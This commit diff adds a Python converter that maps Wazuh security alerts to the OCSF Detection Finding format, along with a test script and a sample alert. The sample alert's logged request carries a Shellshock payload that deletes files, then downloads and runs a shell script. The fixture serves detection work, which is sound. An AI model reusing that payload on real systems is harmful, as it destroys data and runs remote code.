Add script to convert Wazuh events to OCSF

Also adds a simple test script

integrations/amazon-security-lake/ocsf/__init__.py

@@ -0,0 +1,2 @@
+# Python module placeholder
+# TODO export submodules

integrations/amazon-security-lake/ocsf/converter.py

@@ -0,0 +1,82 @@
+#!/usr/bin/python
+
+# event comes from Filebeat
+event = {}
+
+def normalize(level: int) -> int:
+    """
+    Normalizes rule level into the 0-6 range, required by OCSF.
+    """
+    # TODO normalization
+    return level
+
+def convert(event: dict) -> dict:
+    """
+    Converts Wazuh events to OCSF's Detecting Finding (2004) class.
+    """
+    ocsf_class_template = \
+    {
+        "activity_id": 1,
+        "category_name": "Findings",
+        "category_uid": 2,
+        "class_name": "Detection Finding",
+        "class_uid": 2004,
+        "count": event["_source"]["rule"]["firedtimes"],
+        "message": event["_source"]["rule"]["description"],
+        "finding_info": {
+            "analytic": {
+                "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string
+                "name": event["_source"]["decoder"]["name"],
+                "type": "Rule", # analytic.type is redundant together with type_id
+                "type_id": 1,
+                "uid": event["_source"]["rule"]["id"], 
+            },
+            "attacks": {
+                "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object
+                "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object
+                "version": "v13.1"
+            },
+            "title": event["_source"]["rule"]["description"],
+            "types": [
+                event["_source"]["input"]["type"]
+            ],
+            "uid": event["_source"]['id']
+        },
+        "metadata": {
+            "log_name": "Security events",
+            "log_provider": "Wazuh",
+            "product": {
+                "name": "Wazuh",
+                # Skipped. 
+                # OCSF description of this field is: The version of the product, as
+                # defined by the event source. For example: 2013.1.3-beta. We do not
+                # save such info as part of the event data.
+                # "version": "4.9.0", 
+                "lang": "en",
+                "vendor_name": "Wazuh, Inc,."
+            },
+            "version": "1.1.0",
+        },
+        "raw_data": event["_source"]["full_log"],
+        "resources": [
+            {
+                "name": event["_source"]["agent"]["name"],
+                "uid": event["_source"]["agent"]["id"]
+            },
+        ],
+        "risk_score": event["_source"]["rule"]["level"],
+        "severity_id": normalize(event["_source"]["rule"]["level"]),
+        "status_id": 99,
+        "time": event["_source"]["timestamp"],
+        "type_uid": 200401,
+        "unmapped": {
+            "data_sources": [
+                event["_index"],
+                event["_source"]["location"],
+                event["_source"]["manager"]["name"]
+            ],
+            "nist": event["_source"]["rule"]["nist_800_53"], # Array
+        }
+    }
+
+    return ocsf_class_template

integrations/amazon-security-lake/ocsf/test.py

@@ -0,0 +1,15 @@
+#!/usr/bin/python
+
+from converter import convert
+import json
+
+converted_event = {}
+with open("wazuh-event.sample.json", "r") as fd:
+    sample_event = json.load(fd)
+    # print(json.dumps(sample_event, indent=4))
+    converted_event = convert(sample_event)
+
+if converted_event:
+    with open("wazuh-event.ocsf.json", "w") as fd:
+        json.dump(converted_event, fd)
+        print("Done")

integrations/amazon-security-lake/ocsf/wazuh-event.sample.json

@@ -0,0 +1,90 @@
+{
+  "_index": "wazuh-alerts-4.x-2024.02.08",
+  "_id": "yBMliY0Bt8FzffO0BOIu",
+  "_version": 1,
+  "_score": null,
+  "_source": {
+    "input": {
+      "type": "log"
+    },
+    "agent": {
+      "name": "redacted.com",
+      "id": "000"
+    },
+    "manager": {
+      "name": "redacted.com"
+    },
+    "data": {
+      "protocol": "GET",
+      "srcip": "000.111.222.10",
+      "id": "404",
+      "url": "/cgi-bin/jarrewrite.sh"
+    },
+    "rule": {
+      "firedtimes": 1,
+      "mail": false,
+      "level": 6,
+      "pci_dss": [
+        "11.4"
+      ],
+      "tsc": [
+        "CC6.1",
+        "CC6.8",
+        "CC7.2",
+        "CC7.3"
+      ],
+      "description": "Shellshock attack attempt",
+      "groups": [
+        "web",
+        "accesslog",
+        "attack"
+      ],
+      "mitre": {
+        "technique": [
+          "Exploitation for Privilege Escalation",
+          "Exploit Public-Facing Application"
+        ],
+        "id": [
+          "T1068",
+          "T1190"
+        ],
+        "tactic": [
+          "Privilege Escalation",
+          "Initial Access"
+        ]
+      },
+      "id": "31166",
+      "nist_800_53": [
+        "SI.4"
+      ],
+      "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",
+      "gdpr": [
+        "IV_35.7.d"
+      ]
+    },
+    "location": "/var/log/nginx/access.log",
+    "decoder": {
+      "name": "web-accesslog"
+    },
+    "id": "1707402914.872885",
+    "GeoLocation": {
+      "city_name": "Amsterdam",
+      "country_name": "Netherlands",
+      "region_name": "North Holland",
+      "location": {
+        "lon": 4.9087,
+        "lat": 52.3534
+      }
+    },
+    "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"",
+    "timestamp": "2024-02-08T11:35:14.334-0300"
+  },
+  "fields": {
+    "timestamp": [
+      "2024-02-08T14:35:14.334Z"
+    ]
+  },
+  "sort": [
+    1707402914334
+  ]
+}